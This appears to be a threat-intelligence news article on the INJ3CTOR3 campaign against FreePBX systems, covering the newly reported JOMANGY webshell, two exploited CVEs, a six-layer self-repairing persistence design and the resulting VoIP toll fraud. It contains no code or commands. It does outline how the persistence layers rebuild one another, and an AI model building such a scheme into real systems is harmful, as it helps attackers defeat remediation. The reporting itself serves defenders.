A financially motivated threat actor with a documented history of targeting voice-over-IP infrastructure has deployed a previously undocumented webshell family against FreePBX systems worldwide, establishing persistence through a six-layer mechanism specifically designed to survive every conventional remediation step short of a complete system rebuild. Cyble Research & Intelligence Labs published the analysis on May 22, 2026, documenting the first-ever public description of the JOMANGY webshell alongside a campaign by INJ3CTOR3 that exploits two FreePBX vulnerabilities to gain initial access without requiring any user interaction.
The Six-Layer Self-Healing Persistence Mechanism
The technical centerpiece of this campaign is INJ3CTOR3’s persistence architecture, which functions as a self-repairing system where each individual layer is capable of rebuilding any other layer that an administrator removes. The six components operate independently and in coordination: a cron-based command-and-control polling job provides the primary callback mechanism; shell profile modifications to .bashrc and .profile ensure execution persists across user logins; protected crontab backups reinstall the cron job if it is deleted; process watchdogs detect and restart any killed malicious processes; multiple copies of JOMANGY and ZenharR webshells are distributed across different directories so that removing one copy leaves others intact; and a PHP-based execution chain monitors and restores deleted components automatically.
The practical consequence is that an administrator who discovers and removes one or two layers faces a system that reconstitutes itself from the remaining layers within minutes. Effective remediation requires identifying and eliminating all six simultaneously — a process that demands complete forensic mapping of the compromise before taking any action. For small and medium businesses running FreePBX with limited IT resources, the realistic outcome is that partial remediation attempts fail and the actor retains access, which is exactly the outcome the architecture is designed to produce.
CVE-2025-64328 and CVE-2025-57819 Initial Access
INJ3CTOR3 gains entry via two FreePBX vulnerabilities requiring no user interaction. CVE-2025-64328 is a command injection flaw in the FreePBX filestore module; CVE-2025-57819 is a pre-authentication SQL injection vulnerability in the Endpoint module. Both vulnerabilities have patches available, but hundreds of FreePBX systems remain compromised months after those patches were released — a pattern consistent with the limited patch management capacity of the small business and professional services environments where FreePBX is commonly deployed.
JOMANGY: A Webshell Without Detection Coverage
JOMANGY is documented here for the first time in any public threat intelligence source. Its absence from prior research means that signature-based detection tools — antivirus, intrusion detection systems, and threat intelligence platforms that rely on known-bad file hashes or behavioral signatures — have no existing coverage for it. An organization running FreePBX that queries its security tooling for JOMANGY indicators before this analysis existed would find nothing, regardless of whether the webshell was already present on the system.
ZenharR and INJ3CTOR3’s Operational History Since 2019
The companion webshell deployed alongside JOMANGY is ZenharR, which was previously documented by Palo Alto Unit 42 in connection with 2022 attacks against FreePBX systems. The reappearance of ZenharR in a 2026 campaign using the same type of target — FreePBX deployments — establishes INJ3CTOR3 as an actor with multi-year operational continuity against the same platform. The actor has been targeting VoIP infrastructure since 2019, and the current campaign represents an evolution of their toolset with the addition of the previously unknown JOMANGY webshell rather than a change in targeting or objective.
The VoIP Toll Fraud Model and Why Victims Discover It Late
INJ3CTOR3’s objective once persistent access is established is toll fraud: the actor routes unauthorized international calls through the compromised FreePBX system’s SIP trunk connections, using the victim’s existing relationship with their telecom provider as the billing vehicle. The victim’s telecom provider charges them for calls they never authorized and never made, at rates that can reach thousands of dollars per hour for certain international destinations.
The discovery timeline for toll fraud is structurally delayed compared to other forms of financially motivated intrusion. Ransomware makes its presence known by design; toll fraud is silent. Victims typically discover it when a monthly telecom bill arrives carrying charges they do not recognize. By that point, the fraudulent calls have already been completed, the charges have been incurred, and the funds have moved. Disputing telecom charges after the fact through a SIP provider involves a different and more difficult recovery process than disputing a credit card transaction.
For small and medium businesses, law offices, and healthcare practices — the typical FreePBX deployment profile — the combination of delayed discovery, a complete system rebuild requirement for remediation, and retroactive telecom liability creates a compounding harm that outlasts the initial intrusion by weeks or months.
